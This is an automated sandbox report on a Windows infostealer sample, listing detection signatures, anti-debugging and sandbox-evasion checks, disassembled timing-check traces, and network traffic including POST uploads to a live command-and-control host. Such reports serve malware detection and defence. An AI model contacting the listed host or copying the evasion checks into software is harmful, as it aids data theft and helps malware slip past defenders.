Windows Analysis Report
fnuFOEqg4j.exe

Overview

General Information

Sample name: fnuFOEqg4j.exe
renamed because original name is a hash value
Original sample name: 61039d97d478405525707e3c0b4b3003.exe
Analysis ID: 1578959
MD5: 61039d97d478405525707e3c0b4b3003
SHA1: 501cf467cd61ca88a1e0991c2d7899a97237d8ff
SHA256: be39f15bfaeb90c138dbbc06f647ba537c5b451459343b9ef2a5583c0a02a89c
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • fnuFOEqg4j.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\fnuFOEqg4j.exe" MD5: 61039D97D478405525707E3C0B4B3003)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: fnuFOEqg4j.exeAvira: detected
Source: fnuFOEqg4j.exeReversingLabs: Detection: 65%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: fnuFOEqg4j.exeJoe Sandbox ML: detected
Source: fnuFOEqg4j.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: fnuFOEqg4j.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 506466
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 506466
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2838493021.0000000001662000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2841593023.0000000001664000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838749363.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710

System Summary

Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: .idata
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: fnuFOEqg4j.exeStatic PE information: Section: jjnhjgow ZLIB complexity 0.9944498462373372
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: fnuFOEqg4j.exeReversingLabs: Detection: 65%
Source: fnuFOEqg4j.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: fnuFOEqg4j.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: kernel.appcore.dllJump to behavior
Source: fnuFOEqg4j.exeStatic file information: File size 4421632 > 1048576
Source: fnuFOEqg4j.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: fnuFOEqg4j.exeStatic PE information: Raw size of jjnhjgow is bigger than: 0x100000 < 0x1afe00

Data Obfuscation

Source: C:\Users\user\Desktop\fnuFOEqg4j.exeUnpacked PE file: 0.2.fnuFOEqg4j.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jjnhjgow:EW;esuyrufd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jjnhjgow:EW;esuyrufd:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: fnuFOEqg4j.exeStatic PE information: real checksum: 0x445011 should be: 0x445019
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: .idata
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: jjnhjgow
Source: fnuFOEqg4j.exeStatic PE information: section name: esuyrufd
Source: fnuFOEqg4j.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016BF3E8 push eax; ret 0_3_016BF3E9
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016C0FF3 push ds; retf 0_3_016C1012
Source: fnuFOEqg4j.exeStatic PE information: section name: jjnhjgow entropy: 7.956153256454164

Boot Survival

Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: FilemonclassJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FA45 second address: C4FA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC19D472F31h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FF93 second address: C4FFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC19CEC1DCEh 0x0000000a jg 00007FC19CEC1DC6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FC19CEC1DC6h 0x0000001a jmp 00007FC19CEC1DCFh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FFBC second address: C4FFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C4FFC0 second address: C4FFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FC19CEC1DCCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50277 second address: C50281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508BF second address: C508D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508D9 second address: C508E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508E4 second address: C508EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C508EB second address: C50906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FC19D472F2Ah 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e ja 00007FC19D472F26h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50A35 second address: C50A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FC19CEC1DC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FC19CEC1DC6h 0x00000013 jmp 00007FC19CEC1DCDh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007FC19CEC1DCEh 0x00000021 jg 00007FC19CEC1DC8h 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C3A second address: C50C40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C40 second address: C50C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FC19CEC1DCFh 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C50C59 second address: C50C75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F37h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C51053 second address: C51057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C51057 second address: C5105B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A472 second address: C5A489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A489 second address: C5A48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5A48F second address: C5A4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FC19CEC1DCAh 0x0000000d jbe 00007FC19CEC1DDCh 0x00000013 jmp 00007FC19CEC1DD6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BC6F second address: C1BCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F35h 0x00000009 pop edi 0x0000000a je 00007FC19D472F34h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCA3 second address: C1BCAD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC19CEC1DC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCAD second address: C1BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C1BCB9 second address: C1BCC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC19CEC1DC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16A9C second address: C16AA6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16AA6 second address: C16AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C16AAC second address: C16AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007FC19D472F26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FC19D472F26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5F361 second address: C5F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC19CEC1DD9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C22A3C second address: C22A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E84F second address: C5E853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E853 second address: C5E86E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F31h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E86E second address: C5E872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5E98D second address: C5E997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C5F06D second address: C5F08F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC19CEC1DD8h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FA4 second address: C60FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FAA second address: C60FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FC19CEC1DD8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FC19CEC1DC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C60FC1 second address: C60FC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6123B second address: C61256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC19CEC1DD0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61256 second address: C6125A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6125A second address: C61260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C613F7 second address: C613FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61DB9 second address: C61DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61EDE second address: C61EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FC19D472F26h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61EEB second address: C61EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C61FA5 second address: C61FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62090 second address: C62094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62191 second address: C6219B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C6219B second address: C621E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC19CEC1DCDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC19CEC1DC8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov di, cx 0x0000002d push eax 0x0000002e sub edi, 48945EAFh 0x00000034 pop edi 0x00000035 push eax 0x00000036 jnc 00007FC19CEC1DD4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C62603 second address: C62607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
